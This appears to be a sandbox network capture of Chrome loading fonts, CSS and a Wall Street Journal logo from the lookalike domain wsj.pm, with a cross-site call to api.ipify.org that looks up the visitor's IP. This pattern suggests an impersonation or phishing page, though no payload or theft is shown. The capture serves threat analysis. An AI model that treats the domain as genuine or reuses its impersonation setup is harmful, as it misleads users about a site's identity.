                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:17 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "b7fc-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47100
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.17 | 49719 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:17 UTC | 553 | OUT | GET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:17 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:28 GMT
                                                                                                                ETag: "b7e0-60eae3ba48500"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47072
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.17 | 49722 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:17 UTC | 554 | OUT | GET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:33 GMT
                                                                                                                ETag: "b9c0-60eae3bf0d040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47552
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.17  49723        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:17 UTC  557                OUT        GET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:47 GMT
                                                                                                                ETag: "b730-60eae3cc66fc0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 46896
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.17  49724        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:18 UTC  520                OUT        GET /style.css HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: style
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  271                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:36:31 GMT
                                                                                                                ETag: "68a-6164944164dc0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1674
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/css
2024-04-25 14:58:18 UTC  1674               IN         Data Ascii: .centered-link { position: absolute; display: flex; align-items: center; justify-content: center; font-size: 22px; z-index: 1111; width: 100%; height: 100%; font-weight: 700; text-align: center; text-


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.17  49725        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:18 UTC  556                OUT        GET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:42 GMT
                                                                                                                ETag: "ba14-60eae3c7a2480"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47636
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                Data Ascii: @z|3pm%a7c~[rG"Ij~F$n6\8FVRZ%x"KeM6z,yKN'LgU!#?)IH*&7cW}RuLq6amOWj[J1CzudKKO@A3'W z1v0M}WrRa`aTgUs|W8$5L
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: a8 62 08 d0 35 7d 33 0a eb d6 56 b4 60 b4 e1 f9 57 b4 69 58 b5 df 6c 89 fc 8a b4 c2 63 47 9b ef 9c 23 13 a9 9b 9d 48 97 3c 4c 41 e7 b3 d0 03 9a e6 41 c2 a7 24 6a d7 f8 ce 68 92 e1 41 e1 93 03 75 49 72 8a 1d 24 60 2c d2 36 94 dd 9d ba 09 af 27 2a c8 25 df 32 88 2d 16 8c 8d 7b cd e6 3e 23 ce 7a bf cb 92 d0 33 41 64 7e 83 b3 9e 77 74 f2 5d 2c 92 2c 71 14 1b 06 5a fb 1d 99 74 d9 d4 c0 59 55 37 cc 14 22 e0 a1 f6 50 c2 b3 0f 41 44 37 64 a4 4d 78 92 4a 46 f8 0c 15 e7 1d 66 66 6c 98 0d 23 e3 51 61 eb 72 ea c3 55 bb 5f 21 c1 d9 35 f3 7d 95 ea e3 ee b2 3d 84 99 09 96 0f ad b4 cc 82 37 d5 82 b4 9b bc ec d4 3a 41 8c fd c9 3e 64 cd cf d1 f5 6d 33 ef f6 92 d7 1c fd e0 33 60 e4 92 6b e9 73 93 62 5e ee 49 4b cf e1 5b 06 b9 a6 2c 58 ed 30 4d 3c 17 f3 1e 53 1e a7 08 d7 ad
                                                                                                                Data Ascii: b5}3V`WiXlcG#H<LAA$jhAuIr$`,6'*%2-{>#z3Ad~wt],,qZtYU7"PAD7dMxJFffl#QarU_!5}=7:A>dm33`ksb^IK[,X0M<S
                                                                                                                2024-04-25 14:58:18 UTC7696INData Raw: 48 99 5c f4 7e 94 94 55 6b 1d cf 95 36 97 c6 c1 c2 b9 35 a0 12 da db 8e 13 33 b1 da bf 34 65 46 ce 36 bb 04 da 7e 70 77 9c c1 cb 40 04 f6 cd e9 60 38 ef 77 ec d1 08 c5 1d 92 65 7b 8f e7 15 3a af db 78 06 58 f9 31 57 cb 5f 52 a5 96 0f c3 1e 40 6b 23 2f b1 d9 d7 86 3b c9 13 69 f2 18 18 3b 42 11 47 eb 4e 26 a0 6a 5e 24 6d 78 77 da 9c 2b 5c 65 10 ef 9d 7b 79 47 78 85 54 90 c4 1c d6 4c b3 28 14 3f c5 ab 97 4f 0f a7 b7 f3 db f1 5c 4f 52 07 05 49 d2 45 12 4b 4b af 2a dd 0c a7 5c 5a 9a 36 dc e6 56 a9 48 25 41 0c d6 11 a7 36 ba 41 1a 54 55 22 12 bf 78 00 38 d8 0f d9 15 9e 11 83 9e a2 4d ec 92 6e 21 f9 b5 56 9a ba e8 6e a9 da 75 24 7e f1 64 19 05 85 57 9a 67 ed 4f e7 b3 64 45 5b 73 1c dd 82 60 82 03 96 0a 24 c6 8d f5 f9 8a a3 13 c5 5c c2 60 06 41 a8 78 09 2b c9 cd
                                                                                                                Data Ascii: H\~Uk6534eF6~pw@`8we{:xX1W_R@k#/;i;BGN&j^$mxw+\e{yGxTL(?O\ORIEKK*\Z6VH%A6ATU"x8Mn!Vnu$~dWgOdE[s`$\`Ax+


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.17  49726        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:18 UTC  558                OUT        GET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:51 GMT
                                                                                                                ETag: "b884-60eae3d0378c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47236
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.17  49727        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:18 UTC  556                OUT        GET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:37 GMT
                                                                                                                ETag: "bec0-60eae3c2dd940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 48832
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.17  49728        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:18 UTC  570                OUT        GET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:18 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "68dc-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 26844
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                11 | 192.168.2.17 | 49729 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:18 UTC | 571 | OUT | GET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "6488-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 25736
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                12 | 192.168.2.17 | 49730 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:18 UTC | 572 | OUT | GET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "64e0-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 25824
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                13 | 192.168.2.17 | 49732 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:19 UTC | 562 | OUT | GET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC | 253 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:41:23 GMT
                                                                                                                ETag: "1054d-60eae37c4b2c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 66893
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                Data Ascii: PMC'|}c,baBH\I 4)I!D1iIfnEZFf`5&)7?8<3,V#rFmW-urAO@(Ut2e&!%#g`dbfa/{=N.n9rySPb~%J)WRj5jy}fYVmu[OIKod"]>3+P(ePXju^FMdrh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.17 | 49733 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:19 UTC | 556 | OUT | GET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1
Host: wsj.pm
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Origin: https://wsj.pm
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://wsj.pm/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC | 252 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:19 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 11 Jan 2024 16:41:21 GMT
ETag: "f9d5-60eae37a62e40"
Accept-Ranges: bytes
Content-Length: 63957
Connection: close
Content-Type: font/woff2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.17 | 49737 | 104.26.12.205 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:19 UTC | 535 | OUT | GET /?format=json HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://wsj.pm
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://wsj.pm/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC | 249 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: close
Access-Control-Allow-Origin: *
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 879f30c7c9911361-ATL
2024-04-25 14:58:19 UTC | 23 | IN | Data Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
Data Ascii: {"ip":"185.152.66.230"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.17 | 49734 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:19 UTC | 558 | OUT | GET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1
Host: wsj.pm
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Origin: https://wsj.pm
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://wsj.pm/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC | 252 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:19 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
ETag: "ff55-5e34c95a213c0"
Accept-Ranges: bytes
Content-Length: 65365
Connection: close
Content-Type: font/woff2
                                                                                                                Data Ascii: 4+87.<EAJ/ZRR< "5EB/,Pntp>{g~.n"A(};aGx@6]B2Qm+e]*:ky=l0g?.H27Y4e@%o5>x'lNMhBy1]IAfE8&)y}-'j:kK}jI2&c?}l8G


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.17  49735        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:19 UTC  623                OUT        GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC  254                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Mon, 31 Aug 2020 06:54:20 GMT
                                                                                                                ETag: "1d3e-5ae26df2fdf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7486
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:19 UTC7486INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 38 33 22 20 68 65 69 67 68 74 3d 22 31 31 32 2e 35 38 38 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 36 35 32 20 36 31 2e 35 34 34 63 30 20 33 2e 30 32 33 2e 38 37 38 20 33 2e 36 30 37 20 32 2e 38 32 39 20 34 2e 30 39 37 6c 33 2e 30 32 33 2e 36 38 33 76 31 2e 33 36 35 48 37 2e 34 31 32 76 2d 31 2e 33 36 35 6c 32 2e 35 33 36 2d 2e 35 38 34 63 31 2e 39 35 31 2d 2e 34 38 37 20 32 2e 38 32 39 2d 31 2e 34 36 35 20 32 2e 38 32 39 2d 34 2e 31 39 33 56 32 2e 34 33 38 68 2d 32 2e 31 34 36 63 2d 36 2e 30 34 37 20 30 2d 38 2e 34 38 35 20 39 2e 38 35 31 2d 39 2e 31 36 38 20 32 30 2e 32 38 37 48 30 56 2e 34 38 38 68 33 34 2e
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="783" height="112.588"><path d="M21.652 61.544c0 3.023.878 3.607 2.829 4.097l3.023.683v1.365H7.412v-1.365l2.536-.584c1.951-.487 2.829-1.465 2.829-4.193V2.438h-2.146c-6.047 0-8.485 9.851-9.168 20.287H0V.488h34.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.17  49736        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
